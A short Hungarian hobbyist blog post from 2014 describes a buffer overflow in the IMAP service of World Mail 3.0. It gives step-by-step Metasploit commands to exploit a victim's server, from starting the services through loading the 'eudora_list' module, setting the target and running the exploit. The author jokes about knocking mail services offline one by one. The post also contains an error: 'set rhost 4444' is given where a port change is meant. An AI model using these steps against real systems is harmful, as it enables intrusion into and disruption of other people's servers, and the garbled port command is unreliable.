2014. február 18., kedd

World Mail 3.0 Buffer Overflow, avagy miért ne használjunk régi mail szolgáltatásokat

Sziasztok! Ma szintén egy biztonsági hibáról fogok írni. :) Ez megint egy buffer overflow lesz ami nem új már nektek. (Mármint azoknak akik rendszeresen olvassák a blogot) Szóval aki eddig használt World Mail email szolgáltatást az ne tegye többé! :D
Mivel minden eddigi kiadásban van buffer overflow sebezhetőség, és tudjátok hogy ezen keresztül könnyen komoly károkat lehet okozni a rendszerben. A sebezhetőség igazából a World Mail által feltett egyik szolgáltatásban van nevezetesen az IMAP-ban.
Ha te is ki akarod próbálni a sebezhetőség kihasználását akkor szükséged lesz a World Mail-re, és a Metasploit-ra.
World Mail szolgáltatást itt töltheted le: World Mail 3.0.
Egyébként a sebezhetőségre könnyen írhatunk Python szkriptet is... És akkor lehet szórakozni azzal,hogy egyesével kapcsoljuk le az email szolgáltatásokat. :)
Mi viszont most a Metasploit-os verziót fogjuk megnézni. Kezdjünk is hozzá! Írjuk a következőket parancssorba (Kali linux alatt):
service  postgresql start
service metasploit start
msfpro
És ha bejön a konzol akkor írd be ezeket:
use windows/imap/eudora_list
set rhost áldozat ip címe
set imapuser a (ide bármit írhatsz)
set imappass b (ide is írhatsz bármit)
exploit
Ha kell akkor állítsd át az rportot más számra. (Ez arra jó ha esetleg nem a 143-as porton futna az IMAP) Ezt a következő paranccsal teheted meg:
set rhost 4444 (ide kell megadni a portot)
Ha minden jól ment akkor bent is vagyunk :)
Ennyi lenne remélem érthető volt kösz,hogy elolvastad. :)